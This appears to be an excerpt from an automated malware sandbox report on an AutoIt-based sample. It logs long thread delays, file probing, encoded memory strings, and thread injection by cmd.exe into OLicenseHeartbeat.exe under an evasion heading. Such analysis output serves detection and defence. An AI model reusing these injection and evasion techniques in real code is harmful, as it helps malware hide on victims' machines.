Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 70098
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 118782
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 68075
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98860
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 101240
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 52037
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 32379
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 76502
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 118775
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\fkeabad\Autoit3.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\

Source: Autoit3.exe, 0000000D.00000002.596679945.0000000001A16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUp%j
Source: cmd.exe, 0000000E.00000002.706196791.0000000003337000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Autoit3.exe	Binary or memory string: +sIGhDJxZUVM1sqLmrzSLYo/XwaPj9IFkgc81cqEMU36wgaEPHFlRUzWyouKsi2KP18Gg7+P0gcSBbzVytQxTfrCBtQ+cWVFTNbK27qyP1o/XwaDv4/SBZIHPNXKhDFN+sIGhDhxZUVM1sqKmrzSLYo/XwaP4gR/ggc81cqEMU36wgaEOnFlRUzWyov6sg7qMi6KMg7qci6Kfw9mmjqyBr/iBH+CBzzVyoQxTfrCBoQ0sXVFQg7qMi6KPNbKivq/D2aa
Source: Autoit3.exe	Binary or memory string: FdArCCoQwqrq6sgqEM9TlRUL2vfRSCoQ3RfVFTw9mj+IEf6+CBzJv5XIO6jIOtXEq+rq6tDeUNUVCD+V6QEeCDuoyDrV0Pyr6ur8PL2aDv+IEf4IPajKGhXQJAgqEMuQ1RUr1WHqNisIKhDl6urqyCoEaqrq6tDg6+rq0CsIKhDaKqrqyCoQ7dOVFQva99FIKhDzl9UVCCoQ6FOVFQva98RIKhD+F9UVPD2aP4gRyhvU5h5Iv5TIu5XmGv+w/AU6qvPV
Source: Autoit3.exe	Binary or memory string: r/iBH+CBzzVyoQxTfrCBoQxcXVFQg7qMi6KMg7qci6KfNbKiuq/D2aaOrIGv+IEf4IHPNXKhDFN+sIGhDOxdUVCDuoyLooyDupyLop81sqK2r8PZpo6sga/4gR/ggc81cqEMU36wgaEPPF1RUIO6jIuijIO6nIuinzWyorKvw9mmjqyBr+P0gcSBbzVytQxTfrCBtQ5MXVFTNbK2gqytQql6wa80i7aP18Ggga/tDMRdUVPPNbKuuq3bzozBoJuur+0M
Source: Autoit3.exe	Binary or memory string: F1RU881sq6yrdvOjMGgm66v7Q9kXVFTzzWyrrat006MwaCbrq/j9IFkgc81cqEMU36wgaEN/EFRUmGsi6KPNbKirqibooyB9Q09XVVT18Gg7+P0gWSBzzVyoQxTfrCBoQwMQVFSYayLoo81sqKOrJuij+xJUVFTUEaqrq6sgbUOCrVRU9fBoIGv4/SBZIHPNXKhDFN+sIGhD2xBUVJhrIuijzWyopqsm6KMgfUOrslRU9fBoO/j9IFkgc81cqEMU36wg
Source: Autoit3.exe	Binary or memory string: SBtQ3awVFQgYxGv7eqrIK+PQ1laVVQva96nzSCozRGiq0NhHVRU8fXwaKurq6+pq6urq6trq6urq6ur7fj9/CByIFkgU81crEMU36wgbEOuFVRUK5bHyO2rq9+7pBVozSCv7ivI7avNIqxArs1srKirItyj9PXwaPj9IFkgc81cqEMU36wgaENnFlRUzWyoqKsi2KP18Gg7+P0gcSBbzVytQxTfrCBtQwcWVFTNbK26qyP1o/XwaDv4/SBZIHPNXKhDF
Source: Autoit3.exe	Binary or memory string: MVFRDe1JUVPT18CBO9mg7QwSrq6toIGv4/fz6IFkgc81cqEMU36wgaEN1V1RUzSCVzShUv9il/fhD6UxUVEM+UlRUQNLNKlSrqt68zWyoq6qYayLooybooyD9o0NkllRUQPDNKlSqqt64zSKQIO2jIuijIGhUvo+j7KtA6s1cbKuL37sSn6zqqyB9IGhDNVZUVECBIH8gbEOI7KurL2vfusGrIGUgeCDvj68gs1T4g0Cn/fhDbE1UVEOxUlRU8fT18Gg
Source: Autoit3.exe	Binary or memory string: +P0gcSBbkFjfnc1cqEMU3o3NXK1DFN+sIG1DgldUVCCoIq0g6K8i7a8g6KMi7aMg6Kci7adAoiB4IG1Dv1RUVPXwaDv+IEcob1v4/fwgUiBZIHMm7lv7Q/tNVFSYa/7DI6Pqq89Um88iiyB9Ju5bQydUVFQm7ltUvouj7KukHGQm/lsgaEPpqaurmGvx8vLPIrvDJKPqqybuW0OOV1RUaEJEnlRUQFv09fAgTvZoIGv+IEfBq/ggc5hr/sN9o+qrz1Sb
Source: Autoit3.exe, 00000008.00000002.565947520.0000000001213000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00450514 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00458B34 mov eax, dword ptr fs:[00000030h]

Source: C:\ProgramData\fkeabad\Autoit3.exe

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: FF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 11A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 11E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 1260000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 12A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 12E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 1320000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 2FA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 2FE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3020000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3060000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 30A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 30E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3120000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3160000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 31A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 31E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3220000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3260000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 32A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 32E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3320000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3360000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 33A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 33E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3420000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3460000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 34A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 34E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3520000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3560000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 35A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 35E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3620000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3660000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 36A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 36E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3720000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3760000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3790000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3910000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3950000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3990000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 39D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3A00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3B80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3BC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3C00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3C30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3DB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3DF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3E30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3E60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3FE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4020000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4060000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 40A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 40D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4250000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4290000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 42C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4440000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4480000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 44C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4500000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4540000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4580000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 45C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4600000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4640000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4680000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 46C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4700000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4740000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4780000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 47C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4800000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4840000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4880000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 48C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4900000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4940000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4980000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 49C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4AC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4BC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4CC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4DC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4EC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4FC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5000000
